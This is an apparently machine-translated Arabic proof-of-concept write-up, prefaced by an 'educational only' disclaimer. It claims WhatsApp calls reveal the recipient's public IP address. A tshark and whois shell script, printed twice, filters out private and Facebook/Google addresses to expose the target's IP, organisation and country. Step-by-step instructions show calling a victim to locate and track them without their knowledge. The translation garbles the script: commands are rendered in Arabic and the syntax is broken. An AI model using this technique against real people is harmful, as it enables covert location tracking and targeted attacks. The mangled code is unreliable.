هذا البرنامج هو الغرض التعليمي فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد ، خاصة حقيقة أن أنا (Bhdresh) غير مسؤول عن أي أضرار تسببها الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو إساءة استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج ، تقبل حقيقة أن أي ضرر (Dataloss ، تعطل النظام ، حل وسط النظام ، إلخ) الناجم عن استخدام هذه البرامج ليس مسؤولية Bhdresh.
أخيرًا ، هذا تطور شخصي ، يرجى احترام فلسفته وعدم استخدامه للأشياء السيئة!
https://vimeo.com/57735374
أحدث إصدار من تطبيق WhatsApp على جميع الأنظمة الأساسية معرضة للإفصاح عن IP العام لـ WhatsApp.
يلاحظ أنه خلال مكالمة WhatsApp (صوت / فيديو) ، يحاول التطبيق على جانب المتصل إنشاء اتصال مباشر مع عنوان IP العام لجهاز المستلم. من خلال تصفية عناوين IP لـ Facebook و WhatsApp من المضيفين الوجهة ، من الممكن الكشف عن عنوان IP العام الصحيح لمستخدم WhatsApp المستهدف دون علمه.
فيما يلي برنامج نصي سريع لاستغلال هذه الثغرة الأمنية ،
#!/بن/ش
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
صدى "اضغط على Enter واتصل بهدفك."
قراءة الخط
Tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 and ip.dst! = 10.0.0.0/8 and IP.DST! = 172.16.0.0/12 "| بينما تقرأ سطر افعل whois $ line> /tmp /b
مرشح = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
إذا ["$ filter" -gt 0] ؛ ثم TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi
إن إمكانية تعيين مستخدمي WhatsApp مع IP العام لن تكشف فقط عن معلومات موقع مستخدمي WhatsApp ولكن يمكن أيضًا إساءة استخدامها لتتبع حركتهم المادية من خلال الحفاظ على سجل الموقع. يمكن أيضًا إساءة استخدام مثل هذا التعيين المباشر بين المستخدم إلى معلومات IP لتتبع عادات تصفح المستخدمين والتأثير عليه.
علاوة على ذلك ، يمكن استغلال IP العام لإطلاق هجمات مستهدفة تجاه مستخدم Whatsapp أو مكتبها.
المستخدمون: USERA IS لديه تفاصيل WhatsApp من userB
البيئة: n/a
المتصفح: n/a
إصدار التطبيق: <= أحدث إصدار من تطبيق WhatsApp على أي منصة
OS: جميع المنصات باستثناء الويب
الوصف: يقوم USERA بإجراء مكالمة WhatsApp إلى userb ويلتقط معلومات IP العامة دون معرفة المستخدم. فيديو POC لفهم أفضل للخطوات: https://vimeo.com/577355374
الخطوة 1: ابدأ نقطة اتصال WiFi على جهاز المهاجم وتوصيل هاتف المهاجم للمهاجم SSID
الخطوة 2: ابدأ البرنامج النصي POC (أدناه) على جهاز المهاجم الذي يعمل الآن كموجه لهاتف المهاجم
#!/بن/ش
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
صدى "اضغط على Enter واتصل بهدفك."
قراءة الخط
tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 and ip.dst! = 10.0.0.0/8 and IP.DST! = 172.16.0.0/12 "| بينما تقرأ سطر افعل whois $ line> /tmp /b
مرشح = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
إذا ["$ filter" -gt 0] ؛ ثم TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi
الخطوة 3: اتصل بأي مستخدم WhatsApp بشكل عشوائي لالتقاط عناوين IP الخادم للتصفية
الخطوة 4: اتصل بالضحية على WhatsApp
الخطوة 5: افصل المكالمة بمجرد إنشائها
الخطوة 6: سوف يكشف البرنامج النصي عن عنوان IP العام للهدف
الخطوة 7: التحقق من صحة عنوان IP العام على الهاتف المستهدف